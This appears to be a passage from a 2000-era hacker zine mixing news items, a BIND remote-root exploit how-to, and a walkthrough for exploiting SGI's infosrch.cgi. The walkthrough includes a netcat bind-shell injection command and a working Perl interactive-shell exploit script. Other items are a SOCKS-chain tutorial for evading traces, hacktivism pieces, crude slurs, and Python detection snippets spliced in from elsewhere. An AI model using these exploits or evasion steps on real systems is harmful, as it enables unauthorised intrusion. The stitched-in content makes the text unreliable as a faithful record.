      Section A - What is a DNS?
      --------------------------
      
         A DNS - Domain Name Server, is used to convert host names to IP addresses
         and IP addresses to host names.
         for example: www.infoseek.com = 204.162.96.173
      </snip>
      
      <snip>
            2. What is the theory behind the exploit?
               The exploit uses a Buffed Overflow in BIND versions 8.2 - 8.2.2 to
               gain a remote root shell.
      </snip>
      
      <snip>
            6. How do I compile the exploit?
               As always:
               $gcc t666.c -o t666<ENTER>
               $
      
            7. How do I run the exploit?
               $su<ENTER>
               Password:<password><ENTER>
               #./t666 1<ENTER>
      </snip>
      
      <snip>
      Section D - Who should be credited for this HowTo?
      --------------------------------------------------
      
            1. who is the person that motivated me into writing this?
               That person is no other the gov-boi, he operates the great site
               www.hack.co.za. Without him, this How-To would have never been writen!
               Thanks Gov-Boi :)
      </snip>
      
      [Ed: Needless to say, #darknet are super-fuqn-skilled-kick-yo-azz-hax0rz]
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           ________,,,...........                 .........______
      $$$$$$$$$^^^^^                                      '''''"""???zz.   $$
         ^?$$$                                                                `?; $$
           '$$        Daar is geen meer jy vokking Skaapnaaier!@#$%^           $;$$$
            ?;                                                              ,,?;I$$$
           ,"________________________________________________________..,,##',  $$
        _.+                                                                     +.,;
      
      k-r4d 0h-d4y ju4r3z d1ztrh03z...
      
      www.mdma.za.net/fk
      packetstorm.securify.com/mag/fk
      
      Send article submissions, hate mail, pictures of your butt, or whatever to
      wizdumb@leet.org and/or pneuma@mdma.za.net
      
      For automatic delivery of FK to your mailbox as it comes out, subscribe to
      our mailing list by sending mail to minimalist@security.za.net with
      "subscribe fk" in the subject of the message. Propz to Jus for setting this
      up for us, and propz to Mogel of scene.textfiles.com for recommending it.
      
                          < K-Leet Tail Ascii Goez Here - DOH! >
      
       JETZT WERDE ICH IN DEIN ARSCHLOCH EINDRINGEN ALS OB ES POLEN WARE !@#$%^&
      
      @HWA
      
      
294.0 [b0f] Lamagra's "roothat" hacker wargames, hack legally!
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Site:http://roothat.labs.pulltheplug.com                                                                      
      
      Full details at site, some below. Here's a chance to enter a true hacker
      challenge, break the levels to get to level 8 the supreme master and
      don't worry about the ph3dz knocking on yer door! - Ed
     
     
     

      Games


      I've been working on some holes for this box and I came up with 7 neat 
      levels. They all handle about a different topic of exploiting. Each level 
      is more difficult than the previous one. The most simple hole is 
      "difficulty" 2, difficulty 0-1 would be a basic argument stack overflow. 
      Every hole is wrapped inside a program that actually has some purpose. The 
      source can be gotten by doing something special with the program. The 
      source will then be printed to stderr (a simple ./program 2> file.c would 
      save it, be sure to remove it quickly). This all sounds pretty big, 
      impressive and really hard, that's why I set up a hintserver to help you 
      with every level. Its source code can be gotten here. It has a small bug 
      in it to get you into level1. The hintserver is running on the port of the 
      old rsh. There are breakpoints after level1, level2 and level5. Each of 
      these levels starts a new group and has its own homedir, webpage and 
      password. Inside these groups it's possible to skip a level until later 
      on, BUT to obtain the password of the next group, you have to send in all 
      exploit sources (of all levels in the group) (to lamagra@digibel.org 
      subject: roothat:level:nickname) You can keep your level inside a group 
      with backdoors (cracked backdoors (by me) will be deleted).
     
     
      Game-Rules


      - Passwords and exploits should not be traded/sold/whatever, everyone has
        to make his/her own exploits (except if you work in groups)
      - At every breakpoint all exploits have to be sent in to receive the
        password
      - The guest account is staying open for people who *don't* want to play,
        it should not be used by the gamers
      - Backdoors that are easily cracked will be removed
      - It would be nice if backdoors were erased after reaching a breakpoint,
        since they serve no use anymore (just a matter of keeping the box clean
        and the quota down)
      - Don't bother the other gamers in any way (DoS, deleting files, also
        removing entries on the webboard)
      - Keep everything tidy including the webpages

      If you break these rules, you'll be instantly banned from the game (not kidding). 
     
     
      @HWA 
      

295.0 [HWA] Out of the quagmire, something interesting emerges: b10z crew
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      <d0tslash> fucking tests are in the .txt bro peep it out its all fuckin good!
      
      werd.
      
      
      
      Submitted by Cruciphux/d0tslash
      
      [14:39] <Cruciphux> http://b10z.hypermart.net/
      [14:42] <Cruciphux> http://www.pots.gr/projects.html

      irix cgi rape exploit
      ~~~~~~~~~~~~~~~~~~~~~
      
      Feeling lucky? 

      1. Ok shit has changed. No more options. You can fill em in your damn self in the provided boxes.

      2. You still must use either %20 or + for space.
      
      3. By default this rapes SGI infosrch.cgi...read up at security focus if you don't know it or put the gay ass phf hole in the cgi option field or some shit.
      
      4. Like you can pick your own proxy too.
      
      5. If the layout looks like shit ... guess what... I DON'T CARE!
      
       
      
      At least glance at this. 
      <README>
      
      binaries.
      <irix.tgz>
      Read the Advisory
      <ADVISORY>
      Happy Hunting
            
            
            \\b10z\\ + d0tslash
      
      This text is to explain the 0wnage.
      nothing more  nothing less.
      
      compile netcat with #define GAPING_SECURITY_HOLE
      maybe edit Makefile and replace STATIC=-non_shared with STATIC=
      
      upload precompiled nc binary via anonftp If you have a user account 
      you may use this also (what would be the point?). place bin in /tmp
      chmod 755 the bin.
      
      exploit the infosrch.cgi hole to run command:
       /tmp/nc -l -p 11111 -e /bin/sh -i
                            ^-- added with recompile #define GAPING_SEC...
                      ^--- non privileged port
                ^---- listen for connection
      
      -e option will execute the command you specify upon connection
      
      at this point you would telnet to the port to receive the output of the 
      command...in the above example you receive a lame bindshell. type your
      command followed by ; 
      
      viola a bunk ass nobody shell, or if the admin was slippin r00t shell. 
      believe it or not there are a few out there running a www or root.
      
      Please see README.httprape
      
      (10 + ./)
      
      
      Advisory (Securityfocus)
      
      SGI InfoSearch fname Vulnerability

      bugtraq id      1031
      object          infosrch.cgi (exec)
      class           Input Validation Error
      cve             CVE-2000-0207
      remote          Yes
      local           Yes
      published       March 05, 2000
      updated         May 23, 2000
      vulnerable      SGI InfoSearch 1.0
                         + SGI IRIX 6.5
                      SGI IRIX 6.5.7
                      SGI IRIX 6.5.6
                      SGI IRIX 6.5.4
                      SGI IRIX 6.5.3m
                      SGI IRIX 6.5.3f
                      SGI IRIX 6.5.3
                      SGI IRIX 6.5.2m
                      SGI IRIX 6.5.1
                      SGI IRIX 6.5
      not vulnerable  SGI IRIX 6.5.8
                      SGI IRIX 6.2
       
      
       
      
      SGI InfoSearch fname Vulnerability
            The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users.
      
       
      
      http://target/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
      
      /data/vulnerabilities/exploits/infosh.pl
      
      #!/usr/bin/perl -w
      # infosearch.cgi interactive shell. 
      # usage: ./infosh.pl hostname
      # 3/4/00
      # --rpc <h@ckz.org>
      
      use IO::Socket;
      use CGI ":escape";
      $|++;
      
      die "usage: $0 host\n" unless(@ARGV == 1);
      ($host) = shift @ARGV;
      
      $cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";
      
      # url encode and send a command.
      sub send_cmd
      {
      	my($url_command) = $cgi . CGI::escape(shift);
      	$s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
      	if(!$s) { die "denied.\n"; }	
      	print $s "GET $url_command HTTP/1.0\r\n";
      	print $s "User-Agent: \r\n\r\n";
      	@result = <$s>;
      	shift @result until $result[0] =~ /^\r\n/; # uninteresting data. 
      	shift @result; $#result--;		
      return @result;
      }
      
      # draw a pseudo prompt. i like "\h:\w \$ ".
      sub prompt
      {
      	@res = send_cmd("/sbin/pwd");	
      	chomp($pwd = $res[0]);
      	print "$host:", $pwd, "\$ ";
      }
      
      prompt;
      while(!eof(STDIN)) {
      	chomp($cmd = <STDIN>);
      	print send_cmd($cmd);
      	prompt;
      }	 
      
      From the SGI Advisory (attached in full in the 'Credit' section):
      
      Although patches are available for this issue, it is realized that
      there may be situations where installing the patches immediately may
      not be possible.
      
      The steps below can be used to disable the infosrch.cgi(1) program to
      prevent exploitation of this vulnerability until patches can be installed.
      
      
      1) Become the root user on the system.
      
      % /bin/su -
      Password:
      #
      
      2) Change the permissions on the infosrch.cgi(1) program.
      
      
      =================
      **** WARNING ****
      =================
      
      Removing the permissions from the infosrch.cgi(1)
      program will prevent non-root users from using the Infosearch
      subsystem through the HTTP web server.
      
      
      # /bin/chmod 500 /usr/lib/infosearch/bin/infosrch.cgi
      
      
      3) Return to previous level.
      
      # exit
      %
      
      ---
      
      For another workaround, see "Re: Vulnerability in infosrch.cgi" in Credit. 
      
      
       
      SGI IRIX 6.5.6, 6.5.4, 6.5.3m, 6.5.3f, 6.5.3, 6.5.2m, 6.5.1 and 6.5:
      
      SGI upgrade Maintenance Releases
      http://support.sgi.com/colls/patches/tools/relstream/index.html
      Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
       
      credit 
      Posted to Bugtraq on March 5, 2000 by rpc <rpc@inetarena.com>. 
      reference 
      advisory: 20000501-01-P: Vulnerability in infosrch.cgi
      (SGI) 
      message: infosrch.cgi vulnerability (IRIX 6.5)
      (rpc <rpc@inetarena.com>) 
      message: Re: Vulnerability in infosrch.cgi
      (Jose Nazario <jose@biocserver.BIOC.CWRU.Edu>) 
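
      A detection check for the 'fname' injection described in the advisory
      above, as an added example that is not part of the advisory or the
      original posts: it scans web server access logs for infosrch.cgi
      requests whose decoded fname value carries shell metacharacters. The
      common log format, the function names and every sample log line
      (addresses, times, the benign fname path) are constructed for
      illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# NCSA/Apache common log format. The quoted request is split separately so a
# request line that contains raw spaces still parses.
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)
# Characters that let a parameter value break out into a shell command.
SHELL_META = re.compile(r'[|;&`<>\r\n]|\$\(')


def split_request(request):
    """Return (method, target); tolerate a missing protocol or raw spaces."""
    parts = request.split(" ")
    if len(parts) < 2:
        return None
    if len(parts) >= 3 and parts[-1].startswith("HTTP/"):
        return parts[0], " ".join(parts[1:-1])
    return parts[0], " ".join(parts[1:])


def inspect_line(line):
    """Return a finding dict for a suspicious infosrch.cgi request, else None."""
    m = CLF.match(line)
    if not m:
        return None
    req = split_request(m.group("request"))
    if req is None:
        return None
    _method, target = req
    path, _, query = target.partition("?")
    if not unquote(path).lower().endswith("/infosrch.cgi"):
        return None
    # parse_qs decodes %XX and '+' once, which is what the CGI receives.
    for value in parse_qs(query, keep_blank_values=True).get("fname", []):
        hit = SHELL_META.search(value)
        if hit:
            return {
                "host": m.group("host"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "fname": value,
                "meta": hit.group(0),
            }
    return None


def scan(lines):
    """Return findings for every suspicious line, in log order."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample log (documentation address ranges, made-up times/sizes).
BENIGN = ('192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/infosrch.cgi'
          '?cmd=getdoc&db=man&fname=/usr/share/catman/u_man/cat1/ls.z HTTP/1.0" 200 5120')
SAMPLE_LOG = [
    BENIGN,
    '198.51.100.7 - - [01/Jan/2000:10:02:11 +0000] "GET /cgi-bin/infosrch.cgi'
    '?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.0" 200 212',
    '198.51.100.7 - - [01/Jan/2000:10:02:40 +0000] "GET /cgi-bin/infosrch.cgi'
    '?cmd=getdoc&db=man&fname=%7C/bin/uname+-a HTTP/1.0" 200 180',
    '198.51.100.9 - - [01/Jan/2000:10:03:05 +0000] "GET /cgi-bin/infosrch.cgi'
    '?cmd=getdoc&db=man&fname=|/bin/ls -l /tmp HTTP/1.0" 400 0',
    '203.0.113.5 - - [01/Jan/2000:10:04:00 +0000] "GET /index.html HTTP/1.0" 200 1024',
    'not a log line',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

      The status field helps triage: a 200 means the CGI ran with the
      injected value, so those hits come first.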
       


296.0 [MM] Cnet:AltaVista credits players $1 after contest error 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://news.cnet.com/news/0-1007-202-2236499.html

      AltaVista credits players $1 after contest error 
      By Greg Sandoval
      Staff Writer, CNET News.com
      July 10, 2000, 4:30 p.m. PT
      URL: http://news.cnet.com/news/0-1007-200-2236499.html 
      
      Thousands of people who were told erroneously that they had won $500 worth 
      of shopping credit on AltaVista last week are only going to get credit 
      worth a single dollar, the company said. 

      "Our situation is very much like when a bank mistakenly deposits money 
      into your account. It's not yours to keep. I think people understand 
      that," AltaVista spokesman David Emanuel said. 

      AltaVista is giving 1000 points, which equals a dollar's worth of credit, 
      to anyone who participated in the company's Rewards Program contest 
      between July 2 and July 4. It was during that period that some visitors 
      discovered that the Web portal's computer system would bring up a 
      "winner notice" if the contest page was refreshed several times, AltaVista 
      said. 

      But dozens of enraged contest participants on almost a half dozen message 
      boards say they disagree with the company's version of what happened. They 
      say they received notices without ever hitting the refresher key. 

      "I have no sympathy for the people who forced it to display a winner 
      page," said player Jay Battmer in an email to CNET News.com. "But it was 
      pretty rough on those who played the game honestly and won nothing." 

      Many players called for AltaVista to honor all the winning notices, saying 
      the company made the error and should stand by the word of its notices, 
      erroneous or not. 

      Emanuel said there were 20 legitimate winners each day during that period 
      who have received their $500 credit. The others, regardless of whether the 
      person won by tinkering with the system, were incorrectly notified and are 
      not entitled to share in the winnings. 

      In accordance with the rules of the Instant Win game a member is eligible 
      to play the game once per day by clicking the link to the game page one 
      time only, according to a copy of a letter AltaVista sent to players. 

      AltaVista has apologized for the error and said it hopes the 1000 points 
      will be a step toward comforting those who thought they had won the $500 
      in credit. 

      "We have over 300,000 valued customers in our rewards program," Emanuel 
      said. "We have corrected the mistake. When we've explained what happened, 
      that it was a mistake, people seem to understand." 
      
      @HWA


297.0  [HWA] Securax "socksploitation" tutorial
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      +----------------------+----------------------------------------------------+
      |   SECURAX TUTORIAL   |         ANONYMOUS CONNECTIONS OVER THE NET:        |
      |                      |               Socks Chains in Windows              |
      +----------------------+----------------------------------------------------+
      | written by Zoa_Chien |      HTML version with screenshots available at    |
      | design by nostalg1c  |           http://www.securax.org/ZC/anon/          |
      +----------------------+----------------------------------------------------+
      
      
      http://www.socks.nec.com/50001224/sc32b206.exe
      
      
      __/ introduction \___________________________________________________________
      
      this  tutorial  is an  attempt to  help you  re-route  all  internet  winsock
      applications in ms windows through a socks chain, thus making your connections
      much more anonymous.
      
      
      
      __/ theory \_________________________________________________________________
      
      the more different hops you make your data jump, the more difficult it will
      be to trace it back. take this route for example:
      
           you --> socks1 --> socks2 --> socks3 --> ... --> socksx --> target
      
      people who want to trace you will have to contact x persons to ask them for
      their logs. chances are one of them didn't log... and if they logged, the
      ip seen by each host/socks is the ip of the previous host/socks in the chain.
      
      this works for:
      . icq-like tools
      . ftp clients
      . mail clients
      . telnet clients
      . portscanners
      . (just about anything that uses the internet)
      
      it doesn't work on most irc servers since  they often check for open wingates
      and proxies.
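
      The hop-by-hop trace the theory section describes, seen from the
      investigator's side, as an added example that is not part of the
      tutorial: starting from the address the target saw, each relay's log is
      searched for the matching relayed connection, and the walk stops at the
      first relay that kept no logs. The record format, function names,
      addresses and timestamps are constructed for illustration.

```python
from collections import namedtuple

# One relayed connection as a SOCKS host might log it (constructed format):
# at time ts, client src asked this relay to connect to dst:dst_port.
Relay = namedtuple("Relay", "ts src dst dst_port")

SOCKS_PORT = 1080  # port of the wingate SOCKS servers named in the tutorial


def trace_back(observed_src, target, target_port, seen_at, relay_logs, window=5):
    """Walk a SOCKS chain backwards from the address the target observed.

    relay_logs maps a relay address to its list of Relay records, or to None
    when that relay kept no logs. An address that is not a key is treated as
    a non-relay, i.e. the candidate origin.
    Returns (path, status): path lists addresses from the last relay back
    towards the origin; status is "origin", "no_logs", "no_match" or "loop".
    """
    path = [observed_src]
    hop, dst, port, ts = observed_src, target, target_port, seen_at
    while hop in relay_logs:
        logs = relay_logs[hop]
        if logs is None:
            return path, "no_logs"      # this operator cannot tell us more
        matches = [r for r in logs
                   if r.dst == dst and r.dst_port == port
                   and abs(r.ts - ts) <= window]
        if not matches:
            return path, "no_match"     # logs exist but nothing lines up
        rec = min(matches, key=lambda r: abs(r.ts - ts))
        if rec.src in path:
            return path, "loop"
        path.append(rec.src)
        # The previous hop reached this relay on its SOCKS port.
        hop, dst, port, ts = rec.src, hop, SOCKS_PORT, rec.ts
    return path, "origin"


# Constructed scenario: origin -> socks1 -> socks2 -> socks3 -> target:80
ORIGIN, TARGET = "192.0.2.50", "203.0.113.80"
SOCKS1, SOCKS2, SOCKS3 = "198.51.100.1", "198.51.100.2", "198.51.100.3"


def sample_logs():
    """Per-relay logs for the scenario above, with one unrelated record."""
    return {
        SOCKS3: [Relay(500, "192.0.2.99", TARGET, 80),   # unrelated, older
                 Relay(999, SOCKS2, TARGET, 80)],
        SOCKS2: [Relay(998, SOCKS1, SOCKS3, SOCKS_PORT)],
        SOCKS1: [Relay(997, ORIGIN, SOCKS2, SOCKS_PORT)],
    }


if __name__ == "__main__":
    print(trace_back(SOCKS3, TARGET, 80, 1000, sample_logs()))
    broken = sample_logs()
    broken[SOCKS2] = None               # one relay in the middle did not log
    print(trace_back(SOCKS3, TARGET, 80, 1000, broken))
```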
      
      
      __/ now let's do it \________________________________________________________
      
      - first you need to find some boxes running wingate
      
           we look for  wingates since the default installation of wingate includes
           a non-logging socks  server on port 1080
      
           visit 
           http://proxys4all.cgi.net/win-tel-socks.shtml       or
           http://www.cyberarmy.com/lists/wingate/             for some wide-known
           wingate ips, or even better: you could try to find some yourself.
           to do  this,  i would  suggest  you  use  'proxy hunter',  available for
           download at http://www.securax.org/ZC/anon/proxyht300beta5.exe
           be sure to look  for wingates (port 23)  and not  for socks,  as we only
           want wingate socks. 
      
           you   could   also  use   wingatescan,   available   for   download   at
           http://www.securax.org/ZC/anon/wgatescan-22.zip
      
           speed is  very important  since we will be using  multiple socks, and we
           don't want  our programs  to time out. with  the  klever dipstick  tool,
           you can find out  which are the fastest  ones. (get the klever  dipstick
           program at http://klever.net/kin/static/dipstick.exe)
      
           Just fire off Dipstick.  Rightclick  in  the small green rectangle  and
           choose  Show  main  window. To  import a list of wingates, just click on
           Advanced, choose Import List and select your file.
           You  can also  manually ping a  simple host  by clicking on Manual Ping.
           Use those wingates with the smallest average time. *duh*
      
      
      
      - second, check  if   the  wingates  from  the  list  are actually running :)
      
           there are  a lot of  programs that can  help you with this,  one of them
           is    server    2000,    available    for    download    at
           http://freespace.virgin.net/david.wood6/Server/Server.htm
      
      - third,  install  a  program  that  will  intercept all  outgoing networking
        calls.
      
           i  use the  great tool  sockscap for  this purpose.  you can  get it  at
           http://www.socks.nec.com/sockscap.html
      
           in the  setting, enter  this  as  socks server  : 127.0.0.1  port  8000.
           click  on  'socks  version  5'.  click  'resolve  all  names  remotely'.
           uncheck 'supported authentication'.
      
           in  the main  window, choose new  and then browse  to create a  shortcut
           for the internet client you want to give socks support.
      
           repeat this step for every program you want.
      
      - install socks chainer
      
           download it at http://www.ufasoft.com/socks
      
           in the service  menu, click on new. enter 'Chain'  as name and '8000' as
           port to accept connections on.
      
           click on  new and fill  in the ips of  the fastest  wingates you  found,
           but this time, use port 1080 for this (and not the port 23)
      
           using the  '<' and '>',  you can add and  remove socks.  be sure to test
           all socks  one by  one  before  adding  them  all to  the list  at once,
           because if  one of  them is  bad, your chain will not work and you will
           not be able to locate the bad socks in the chain.
      
           if all  of them  seem to  work, you  use the  '<' key  to add  them  all
           (mind  speed  problems. 4  or less  is fine.  i think  10 or  13 is  the
           limit put by tcp/ip)
      
      
      
      
      __/ testing your anonymous setup \___________________________________________
      
      to check  what socks  your computer  is connecting to, you can use x-ploiters
      totostat (http://idirect.tucows.com/files/totostat_install.exe).
      look for connections  to port 1080,  the remote ip  found there should be the
      first ip found in your chain in sockschain.
      
      use the shortcut  in sockscap that  points to your  browser, and connect  to
      http://cavency.virtualave.net/cgi-bin/env.cgi or
      http://internet.junkbuster.com/cgi-bin/show-http-headers
      
      use your shortcut  in sockscap to start your  telnet  client then  telnet to
      ukanaix.cc.ukans.edu
      
      you can also use https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py to
      test ssl or ftp.zedz.net to verify your ip via ftp.
      
      in all the above cases, the remote server should show you the ip of the last
      server in  the  sockschain.  if you  look at  the  sockschain  program while
      surfing you should see the chain being built up.
      
      
      __/ some final remarks \____________________________________________________
      
      never use  internet explorer to do tricky  stuff as it might reveal your ip.
      my personal favorite browser is opera 4.0 (http://www.opera.com/)
      
      if   you  looked   carefully   at   what  is   displayed  when   you  go  to
      the http://internet.junkbuster.com/cgi-bin/show-http-headers page, you might
      have  noticed  that  a  lot  of  stuff  about  our  client  is  being  sent.
      to avoid this, we  could install another proxy  between the sockscap and the
      sockschainer proxy that would filter out those things.
      A4proxy is an example of a proxy capable of doing such things.
      
      
      remember, if you want to do the real stuff, better switch to linux.
      
      
      Zoa_chien, 22/5/error
      #securax on EFNET
      
298.0 [IND] Hacktivism: Hacktivismo with cDc
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      http://cultdeadcow.com/hacktivismo.html
      
     We are HACKERS and we are HACKTIVISTS. Our mandate is to keep the
     Internet free, healthy, and adventurous. We will not be bullied. HACKTIVISTS
     are not the ones who decided to shackle free speech and the open exchange
     of ideas.

     We believe in the 19th Article of the United Nations Declaration on Human
     Rights.
     We believe in the dignity of all human beings.
     And we believe in loud music and big parties. 

     Start reading. Start thinking. Start acting.

                                ***

     Below is a response to the Electrohippies rationale for supporting DDoS
     attacks. Please take the time to visit their site and make up your own mind.

     Key concepts: Electrohippies, anticorporatism, packet wankers, Denial of
     Service (DoS), Freedom of Expression, hacktivism versus [h]activism.

     One Liner: The Electrohippies are trying to rationalize Denial of Service
     attacks and violate the First Amendment privileges of their opponents.

     Links:
     http://www.gn.apc.org/pmhp/ehippies/
     Electrohippies Web site

     http://www.gn.apc.org/pmhp/ehippies/files/op1.htm
     Occasional paper no.1
     Client-side Distributed Denial-of-Service: valid campaign tactic or terrorist act?

     The Electrohippies have published an occasional paper (EOP) that asks
     whether their recently published DoS application is a valid campaign tactic or a
     terrorist act. After introducing a quote from the New Testament that
     transmogrifies Jesus Christ into a packet wanker scourging the Internet of
     E-commerce, the question is then answered with an argument that crucifies all
     common sense. This essay will address several errors from the EOP that
     require correction.

     [All quotes taken from the EOP and appear sequentially]

     "As Jesus ransacked the temple in Jerusalem because it had become a house
     of merchandise, so the recent [DDoS] attacks on e-commerce web sites are a
     protest against the manner of its [sic] recent development".

     This is the first and most egregious error that the Electrohippies make. It
     betrays their lack of understanding of hacker culture; it also creates a false
     bridge to their own anticorporate bias. As no statement of claim was made by
     the DDoS perpetrators, left-leaners, Adbuster sympathizers and wishful
     thinkers projected their own raison d'etre onto the event to construct an illusory
     foundation for their personal projects. In fact the DDoS attacks of early
     February were nothing more than packet wanking at its finest, or as hackers
     would say, going for the full woody. 

     It was irrelevant that the targeted sites were commercial and had e-commerce
     components. They could just as easily have been the Vatican, a Britney
     Spears fan site, or Aunt Beulah's Jam page, that is, if those sites represented
     the same level of prestige and notoriety as the actual targets. There's a lot of
     juice in the packet wanking world associated with taking down a large site. It
     has nothing to do with e-commerce no matter what the Electrohippies, The
     Village Voice or other projectionists wish were the case.

     "Whatever the views of particular people about the development of e-commerce
     on the Net [sic], we must not ignore the fact that as another part of society's
     public space the Internet will be used by groups and individuals as a means of
     protest. There is no practical difference between cyberspace and the street in
     terms of how people use the Net [sic]".

     E-commerce is a technology. It is used across the board by not-for-profit
     groups, independent record companies, and transnational corporations. It is
     this last group, one assumes, that the Electrohippies take issue with. But
     there is no effective difference between this method of exchange and the use of
     cash or credit off-line. By attacking e-commerce the Electrohippies create the
     impression that they are Luddites when what they mean to say is that they are
     anticorporate. Like many people, the Electrohippies have been confused by
     technology. They are trying to filter their agenda through the Internet rather
     than focussing on first principles.

     The Electrohippies further compound their misunderstanding of the Internet by
     assuming that the same rules hold in the digital realm as they do down on the
     street. They do not. Where a large physical mass is the currency of protest on
     the street, or at the ballot box, it is an irrelevancy on the Internet. Or more
     correctly, it is not always necessary. Of course many people can make a
     difference on the Internet if one is talking about site traffic. High visitation
     boosts domain value; conversely its absence will decrease it. But to think that
     it takes a lot of people to execute an act of civil disobedience on the Internet is
     naive. Programs make a difference, not people.

     And as a last thought, I know from personal experience that there is a
     difference between street and on-line protest. I have been chased down the
     street by a baton-wielding police officer on horseback. Believe me, it takes a
     lot less courage to sit in front of a computer.

     "the difference between the two actions [DDoS packet wanking and the
     WTO on-line protests in which the Electrohippies participated] is the one of
     popular legitimacy versus individual will. The structure of the client-side
     distributed actions developed by the electrohippies means that there must be
     widespread support across a country, or continent in order to make the
     system work. Our method has built within it the guarantee of democratic
     accountability".

     The Electrohippies are laboring under several false assumptions here. They
     believe that there is some nexus between their on-line actions against the
     WTO and the DDoS attacks against Yahoo, et al -- there is not. And they think
     that somehow if many people perpetrate a DoS attack as opposed to just one,
     then that is, ethically speaking, a better thing. Bollocks.

     Denial of Service, is Denial of Service, is Denial of Service, period. The only
     difference between a program like Stacheldraht [a DDoS application written by
     The Mixter] and the client side javascript program written by the Electrohippies
     is the difference between blowing something up and being pecked to death by
     a duck. And if numbers lend legitimacy - as the Electrohippies propose - then
     the lone bomber who tried to assassinate Hitler in his bunker was wrong and
     the millions who supported the dictator were right.

     If the Electrohippies wish to take actions that involve large groups then they
     should leverage their supporters against their targets in more practical ways.
     For instance.

     Let's say the Electrohippies take exception to the business practice of a large
     transnational that exploits child labour in developing countries. And let's say
     that this same transnational has an e-commerce enabled Web site selling its
     merchandise. So if the Electrohippies were to organize fifty thousand people to
     make a purchase from said Web site, then return the item with a letter of
     protest and a demand for a refund, then they might lodge a protest with the
     transnational that it would seek to remedy. This particular suggestion would
     have to be tweaked according to the target but it makes the point. Creating an
     intolerable snag in running a business is a far more productive use of protest
     action than disabling a Web server for a short time, the ethics of such
     notwithstanding.

     "the electrohippies collective believe that the acts or views perpetrated by the
     targets of a DoS action must be reprehensible to many in society at large, and
     not just to a small group. It is on this basis that the collective undertook the
     action against the WTO during their conference in Seattle, and it is also the
     basis upon which we are planning future actions".

     Denial of Service attacks are a violation of the First Amendment, and of the
     freedoms of expression and assembly. No rationale, even in the service of the
     highest ideals, makes them anything other than what they are -- illegal,
     unethical, and uncivil. One does not make a better point in a public forum by
     shouting down one's opponent. Say something more intelligent or observe your
     opponents' technology and leverage your assets against them in creative and
     legal ways. 

     Hacktivism is about using more eloquent arguments -- whether of code or
     words -- to construct a more perfect system. One does not become a
     hacktivist merely by inserting an "h" in front of the word activist or by looking
     backward to paradigms associated with industrial organization.

     One does so by living in the present and recognizing reality. We live in a
     post-Newtonian universe although too many people are unaware of this. 

     There is still talk of left and right, of a centre to the margins sensibility. This
     world was blown apart by Einstein. The universe is no longer explosive, it is
     implosive. And to take part in social and political discussions one must move
     inward to the centre rather than outward to the extremes. Being a centrist is
     the new reality; everything else is reactionary.

     While the Electrohippies cannot be faulted for their dedication and good
     intentions, we all know how the road to hell is paved. And if they are as
     dedicated to the Scriptures as they appear to be, then let them ponder this.

     The fear of the LORD is the beginning of knowledge: but fools despise wisdom
     and instruction.
     -- Proverbs, I v7.

     I don't think that the Electrohippies are fools.


     --
     oxblood ruffin!cDc
     foreign minister
     "cDc. We put the hack into hacktivism"
                                                                      
     @HWA                    
     
     
299.0 [IND] Hacktivism: GForce using website defacements to spread their word
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      You have seen the high profile sites on Attrition that have been
      defaced by GForce, SugarKing from HWA Staff interviews GForce
      members for a closer look into why they do it.
      
      (c)2000 SugarKing/HWA.hax0r.news
       if reprinted please include the source
       http://welcome.to/HWA.hax0r.news
       
      [20:59] <sniper-> SugarKing: So we can start the interview ;)
      [20:59] <sniper-> sure
      [20:59] <SugarKing> alright, is this everyone you want present?
      [21:00] <sniper-> yes, most of other guy's arn't on, some are busy, and it's very early here.
      [21:00] <SugarKing> yeah
      [21:01] <SugarKing> ok, you don't have to answer any question if you don't want to...
      [21:01] <sniper-> ok
      [21:02] <SugarKing> so lets begin:)
      [21:02] <sniper-> yep
      [21:02] <SugarKing> ok first off, how many members are there, and who are they?
      [21:03] *** sniper- is now known as sniper__
      [21:03] <rave-> ehehe
      [21:03] <SugarKing> heh
      [21:03] <rave-> services sux
      [21:03] <sniper__> There are about 5 members, they are myself, miller, rave-, heataz, and instinct atm
      [21:03] <SugarKing> ok
      [21:04] <SugarKing> when was the group founded and by who?
      [21:04] <sniper__> It's was founded about a year ago, and by myself, heataz and miller
      [21:05] <SugarKing> what was your sole purpose of starting the group? for the reasons you name in your defacments?
      [21:06] <sniper__> GForce was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir
      [21:06] <sniper__> t was precipitated to bring the attention of world leaders and organizations to the issue in cyberspace which is today the leading source of communication. The motive behind the formation of the group was to create global awareness about kashmir.
      [21:06] <SugarKing> which members are actually from Pakistan?
      [21:07] <SugarKing> if any
      [21:07] <sniper__> we focus on kashmir, basically.
      [21:07] <SugarKing> so nobody is actually from kashmir?
      [21:07] <sniper__> well i`m from pakistan, othger's would like to stay anonymous please.
      [21:08] <sniper__> well no one if from kashmir.
      [21:08] <SugarKing> sure, np
